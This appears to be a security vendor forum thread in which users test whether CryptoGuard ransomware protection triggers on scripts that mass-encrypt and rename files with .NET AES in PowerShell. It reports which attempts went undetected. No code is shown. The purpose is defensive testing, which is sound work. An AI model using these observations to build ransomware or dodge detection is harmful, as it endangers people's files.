In an attempt to trigger CryptoGuard in a test setting I wrote several test scripts encrypting 50k+ files on disk in suspicious file paths. None of them seem to have triggered Cryptoguard, which makes me wonder if it's triggered solely on known IOC's. My first thought was that the number of I/O operations would have been enough to trigger an alarm, but it didn't. Is there something to be said about the detection that could help me trigger an alarm?
So, I took a bunch of files (copied the "Program Files (x86)" dir) and ran this against it. https://gist.github.com/arnydo/a0c41325e579b7dae3c8abd1a6b13980
wonder if it's triggered solely on known IOC'salmost correct, eliminate the known. File encryption is legitimate. Your test scripts likely lack villainousness, simply encrypting 50k+ files on disk in suspicious file paths (BTW: which paths do you call suspicious ?) doesn't make them ransomware (or you a ransomware writer). Testing CryptoGuard or equivalent products is like testing whether your car's airbags would trigger (except that you don't have to replace CryptoGuard after it has triggered)..
May I direct your attention to the following threads
That is a good question. I had the same thought and decided to test this out. I was able to trigger CryptoGuard though.
I am not sure exactly what triggered it. I tested multiple times. Sometimes it triggered and sometimes it didn't.
It all comes down to context and actions. How did you do the encryption? A Powershell script that calls on Windows to encrypt the file?
Snr. New Product Introduction Engineer | CISSP | Sophos Technical SupportSupport Videos | Product Documentation | @SophosSupport | Sign up for SMS AlertsIf a post solves your question use the 'Verify Answer' link.
I used the .Net AesCryptoServiceProvider in PowerShell and ran it against a directory of files, renaming them as it went. Seemed to trigger Sophos after certain number of files were encrypted. I forgot what the threshold was, it has been a while.
what you describe is what I would expect to happen. CG doesn't trigger instantly - it monitors an has a context dependent rule set that will trigger when the the thresholds/criteria are met.
I did use AesCryptoServiceProvider as well against more than 50k files, renaming them to .encrypted after encrypting them. I also ran test where I encrypt/decrypt them multiple times etc. but all without any luck. After that I created a .NET executable (.exe) to try if that makes a difference, but it didn't.
Can you tell more about the files you encrypted? (file size, age) that might be different. Also, did you test recently, or was that some time ago? Thanks for the responses so far!
It looks like I tested this the beginning of 2020.
Ill run it again and see what happens.
Please, let me know the results.
Kyle Parrish said:(copied the "Program Files (x86)" dir)
Thanks Kyle.. I think this is the only noteworthy difference between your attempt and mine. I created dummy text files (created by another proces to make it less obvious).